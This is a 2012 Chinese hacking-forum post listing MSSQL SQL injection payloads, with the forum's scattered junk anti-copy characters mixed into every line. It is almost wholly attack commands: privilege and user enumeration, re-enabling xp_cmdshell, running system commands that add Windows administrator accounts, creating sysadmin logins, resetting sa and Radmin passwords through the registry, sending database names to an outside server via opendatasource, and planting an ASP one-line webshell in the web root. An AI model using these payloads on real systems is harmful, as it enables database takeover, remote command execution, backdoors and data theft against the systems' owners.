找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2300|回复: 0
打印 上一主题 下一主题

常用的一些注入命令

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:40:13 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
//看看是什么权限的
3 Y0 B; T( J3 m6 @* [$ B5 Yand 1=(Select IS_MEMBER('db_owner'))
% @- h' r; p* }" ]2 `: s  \And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--; Z6 ]; x) Q& T# w9 z' c

" E' ]$ O' P7 Y, Q  f' r8 ]- p//检测是否有读取某数据库的权限9 D* |5 z7 T7 F! D! t5 P% T* c. d
and 1= (Select HAS_DBACCESS('master'))) P7 \) c4 c7 Z1 r: A) j+ H
And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --9 d5 _6 V' H3 r1 x4 |

: \7 Z( ?9 `- b, L
  u, E6 }: E. u$ X数字类型
2 G8 e% O2 U" F2 land char(124)%2Buser%2Bchar(124)=0; ~) n4 r# I0 c& e2 j( @
$ Q- S/ Q2 m1 z4 g
字符类型9 W& u6 ~% ~- Y/ y9 ?3 a
' and char(124)%2Buser%2Bchar(124)=0 and ''='
7 N: u+ N& s5 h$ _  H# p% k" o  |' |$ q2 ?; `; ~( t( m
搜索类型
  O6 X+ n8 ^$ j1 w' and char(124)%2Buser%2Bchar(124)=0 and '%'='5 p. o- v9 B7 o  F( _
% ^6 A) g% y8 f
爆用户名
) c1 \8 y( }- K7 |9 P, Oand user>0
# z2 C) ]2 y* _) s. N' and user>0 and ''='
' I6 V, n4 @" d/ C  r/ ?( p5 Y: M& j; z  b5 n
检测是否为SA权限0 q( q& a! F% Z7 k; d; V6 X/ Y, K
and 1=(select IS_SRVROLEMEMBER('sysadmin'));--0 P4 L+ L  s; Q) U
And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --
6 J% c. K" I" L' z5 I! S- w# R
& r4 d. l, a; f6 ?" I8 s检测是不是MSSQL数据库
1 X2 [% v* y" {6 h. _( pand exists (select * from sysobjects);--
- g* O3 U; K( Y1 N9 ?* u8 M- |/ a7 v( `5 V( \
检测是否支持多行
' r  f0 X1 q9 h: O+ M4 b# O$ y7 `;declare @d int;--
: b( M8 ?: ^  l. y) i: l, N, u; [6 i) A. h: o( V4 {
恢复 xp_cmdshell
0 s/ H8 r4 D4 B; [0 G( y;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--3 i! v7 E$ S/ y) r( P) X( Z
. E- g6 a* ]/ P4 e4 X
& P% U: j' h5 d  [! x/ x+ D
select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')
; {- x$ C/ ?! o
: }  H4 o" g  _: E; f//-----------------------# a8 f  R5 }' L% a4 R4 S! B: k
//       执行命令; ?3 [8 `, |8 j8 {9 h) i: z
//-----------------------$ i, q7 \0 t2 j9 \' p
首先开启沙盘模式:
1 N( ]0 c1 b. c3 I# T# Fexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
2 g  M. I5 s3 g4 u! _$ P
6 _% ^2 k/ V) d然后利用jet.oledb执行系统命令' x. o- J$ d4 o+ P1 W8 V: r0 R
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')' F$ u( A9 K5 ^1 |

, }! ~- H! L/ n  {& J1 y执行命令+ n0 h1 [: t* k0 g, l2 h0 t
;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--
& T5 P& l4 v  i' \: M, f/ r- t/ p  C3 ]; K
EXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'7 x( e" U: B6 B4 N2 f
" o3 O) Z/ C6 F
判断xp_cmdshell扩展存储过程是否存在:1 n+ S+ z! L, Z
http://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')  d2 ~  k6 ~; I) T% f* p* b

/ v# b; u5 |; D写注册表' K* t( T3 |$ n, @% t
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',15 x% l' W6 B- y4 [9 V, N2 {; g

! [( w% q8 d/ G1 JREG_SZ- H* \9 t% b. B& e2 i5 a7 a. S
& T1 Y% s  i% d: W, F0 A' s. b+ ^
读注册表
+ B  D* d+ T' gexec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'- K( |0 h0 m3 n6 q6 R
- I3 E- E: K6 t" l# t' u* I
读取目录内容
1 a7 c+ X% w9 T$ M, h- V2 Y; Jexec master..xp_dirtree 'c:\winnt\system32\',1,1* P+ w- c' v, ]( B' U# M% _

9 N5 r9 ?2 S9 j; d. j: }1 n; ^
0 H! \/ p% m; C数据库备份+ N4 |1 T2 K: V! i) N5 D
backup database pubs to disk = 'c:\123.bak'
3 |5 ]( I$ p7 ~) e! }' L1 A! H1 ~5 E5 Z6 i6 W
//爆出长度7 c; Z: B; ^! O5 D9 w  z& Y" {) I
And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--% G- \& _" U3 D$ l

, ~# O8 a/ I9 r2 D
" I& M; H% R* R+ E) p# G
, r3 w% P1 s8 C7 Q' I6 q4 o更改sa口令方法:用sql综合利用工具连接后,执行命令:& u" x  B; m$ ~+ d" }" M  Q
exec sp_password NULL,'新密码','sa'
  u! k5 r0 y6 k* Q; Q1 F' Y% }+ m4 T3 r
. S( |* c1 V' Y添加和删除一个SA权限的用户test:
  `8 l; s1 k/ E. Rexec master.dbo.sp_addlogin test,9530772. Q6 l+ F9 s4 Q( F5 x! m
exec master.dbo.sp_addsrvrolemember test,sysadmin
( i. E1 D6 z1 y0 U( v- O$ [1 a2 J: w6 m" n9 s* ^0 G
删除扩展存储过过程xp_cmdshell的语句:- Y9 t. S4 V" g# v" `5 p! G7 q$ A
exec sp_dropextendedproc 'xp_cmdshell') i( Z( I/ e- X1 Y3 T% G7 ]
8 H% g' |- s# `, J
添加扩展存储过过程
) k  {7 }7 y! t, J% R( X2 rEXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll'
' v6 E0 h' B0 I5 u6 c4 ?GRANT exec On xp_proxiedadata TO public6 o, S: f: u' j7 o  b7 I

9 |9 @4 w. _$ N. X9 e/ ?- c9 k* J; e# |" w% q$ Z
停掉或激活某个服务。% m; M' e8 n) \% y7 H1 j

/ K  r% r, I8 O1 V  }; w3 i' Fexec master..xp_servicecontrol 'stop','schedule'# m& f) ~) S0 c
exec master..xp_servicecontrol 'start','schedule'9 ~3 X6 p, L: v& k

* v, z+ W0 l9 H  U$ R2 V% Zdbo.xp_subdirs- ~9 r/ w% t1 }0 q1 A
0 P( B  x- E7 R: H, S
只列某个目录下的子目录。
& u2 s/ O3 W0 h- I7 x( pxp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'9 d- ^" T' K7 ?# p7 w* v

) Y- F# ?$ {; E$ u& j, s; r6 R/ F- ldbo.xp_makecab5 h: Z* E& T, ?# e7 R# G
8 }( h6 F, m9 w  W
将目标多个档案压缩到某个目标档案之内。
+ o# `$ K* ]+ d+ t: y; ]: p7 \  V所有要压缩的档案都可以接在参数列的最后方,以逗号隔开。
! t7 [$ y8 D- `' U2 _/ n
* s% Y+ H, A+ b* kdbo.xp_makecab
' k6 d: D- h/ [9 d6 s'c:\test.cab','mszip',1,7 }, I$ W2 s2 \" `! D3 u% N9 I
'C:\Inetpub\wwwroot\SQLInject\login.asp',
* A- V+ r' t7 P  y" y'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'
. E; [1 E7 F. R( ?' V5 q% D% U3 m3 d  x) s$ O$ j8 c) s9 U
xp_terminate_process  L6 v7 B$ {0 @6 z8 h! C4 z
% _8 W( R' s0 U1 p  G& f
停掉某个执行中的程序,但赋予的参数是 Process ID。
) I+ w0 i& ]$ @! p) P1 r利用”工作管理员”,透过选单「检视」-「选择字段」勾选 pid,就可以看到每个执行程序的 Process ID
: V$ U4 F$ ]+ I1 g' D& Z; a8 I- T8 n
xp_terminate_process 2484! z, M6 }  e5 ^8 Y$ d

+ y3 i. S: I  L. Nxp_unpackcab4 W  n& |( o( ^, S& w' \& h! K5 G
7 o) E0 `6 c, l8 E7 [
解开压缩档。
  x2 W2 {5 e4 Q% \3 g  p! j* t7 Q5 M& z& I, i/ f3 \
xp_unpackcab 'c:\test.cab','c:\temp',1
) A6 C: x( v+ v, T- m( Q* H) G0 j/ O3 t5 j* `6 z2 A7 G7 O
# @, |4 {0 w* |7 W
某机,安装了radmin,密码被修改了,regedit.exe不知道被删除了还是被改名了,net.exe不存在,没有办法使用regedit /e 导入注册文件,但是mssql是sa权限,使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为1234
& }" M. d: w9 j
4 T- y6 b' v( Z! p0 ?2 Ccreate database lcx;% ^2 L6 V9 _; t* H5 `
Create TABLE ku(name nvarchar(256) null);# f" q- K2 Z, u; `0 O$ B
Create TABLE biao(id int NULL,name nvarchar(256) null);
* b, v, {2 }; {
" X! q+ l4 v. O( Z//得到数据库名
0 P- }$ V. f9 ]; vinsert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases
/ E+ x; k7 V, O. d: _) s2 P3 {0 {( X+ W! e1 |9 [
1 }! D2 ~- v1 [# U# N2 B* C2 a
//在Master中创建表,看看权限怎样3 {, m7 }3 p9 m+ @3 Q' Y" f
Create TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--/ D  Y4 x7 j# f2 D+ z

, U6 x2 i8 D' y$ v$ s' z3 S用 sp_makewebtask直接在web目录里写入一句话马:
1 `! r. A% @2 L. b* s+ Rhttp://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--; `) N* a2 t( n& j" a

( Z' o% G6 Q* ^( K//更新表内容) ]' e9 M. c( n& x  c
Update films SET kind = 'Dramatic' Where id = 123* g! U$ I. L9 Z9 D4 S

4 G3 J% J0 k$ M" v( \! }. _//删除内容) j( v8 d1 F5 T8 j5 ^, z& ^: d
delete from table_name where Stockid = 3
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表